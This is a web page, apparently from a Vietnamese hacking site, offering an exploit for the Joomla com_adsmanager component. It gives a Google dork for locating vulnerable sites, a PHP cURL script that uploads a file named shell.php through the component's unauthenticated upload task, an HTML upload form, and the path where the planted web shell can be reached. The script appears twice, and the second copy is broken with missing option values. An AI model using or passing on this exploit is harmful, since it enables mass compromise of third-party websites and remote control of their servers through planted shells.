Joomla com_adsmanager Exploit

Dork : inurl:/index.php?option=com_adsmanager/ site:/uk/com/org

CODE PHP :

<?php

$url = "site.com/index.php?option=com_adsmanager&task=upload&tmpl=component"; // put URL Here
$post = array
(
"file" => "@shell.jpg",
"name" => "shell.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;

?>

<?php

$url = "site.com/index.php?option=com_adsmanager&task=upload&tmpl=component"; // put URL Here

$post = array

(

"file" => "@shell.jpg",

"name" => "shell.php"

);

$ch = curl_init ("$url");

curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);

curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");

curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);

curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, );

curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, );

curl_setopt ($ch, CURLOPT_POST, 1);

@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);

$data = curl_exec ($ch);

curl_close ($ch);

echo $data;

Các bài viết liên quan

#CSRF :

<form method="POST" action="TARGET/index.php?option=com_adsmanager&task=upload&tmpl=component"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

<form method="POST" action="TARGET/index.php?option=com_adsmanager&task=upload&tmpl=component"

enctype="multipart/form-data">

<input type="file" name="files[]" /><button>Upload</button>

</form>

Acces Shell: site.com/tmp/plupload/shell.php

Xem thêm: SQLMap v1.2.9 - Công cụ khai thác lỗ hổng SQL Injection mạnh nhất

Tags: exploit joomla

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Joomla com_adsmanager Exploit

Hướng dẫn cách phòng tránh Ransomware WannaCry chi tiết nhất

Khai thác lỗ hổng WordPress Plugin WP-Dreamworkgallery

Bảo vệ: Hướng dẫn khai thác lỗi CMS Upload Website 2017

XSS Vulnerability

Hướng dẫn Tạo tool hack disconect LoL

AnonyViet

Related Posts

Download SQLi Dumper v10.1 Full – Tool khai thác lỗi SQL Injection

SQLMap v1.2.9 – Công cụ khai thác lỗ hổng SQL Injection mạnh nhất

Hướng dẫn code kiểm tra lỗ hổng bảo mật Sql Injection với Python script và cách phòng chống.

SQLI Hunter v1.2 – Tự động tìm lỗi SQL Injection

Dork SQL 2015

Hướng dẫn sử dụng SQLMap

Hướng dẫn Tạo tool hack disconect LoL

1

Để lại bình luận

Tuyển Cộng tác viên

Các bài mới

Hack Mod Adorable Home 1.5.6 Full Tim, Heart, Money

Cách Hack Tim Game Adorable Home mới nhất không cần Mod

Code Adorable Home: Danh sách các mã Code nhận thêm Hearts

Tài khoản Twitter của Olympics, FC Barcelona bị hack

Hướng dẫn chơi Game Adorable Home – Cách chơi, mẹo, cheat

Giới thiệu

AnonyViet

Giới thiệu

Liên kết

Liên hệ

Bài viết mới

Joomla com_adsmanager Exploit

Các bài viết liên quan

XSS Vulnerability

Hướng dẫn Tạo tool hack disconect LoL

Related Posts

1 Để lại bình luận

Tuyển Cộng tác viên

Các bài mới

Giới thiệu

AnonyViet

Giới thiệu

Liên kết

Liên hệ

Bài viết mới

1

Để lại bình luận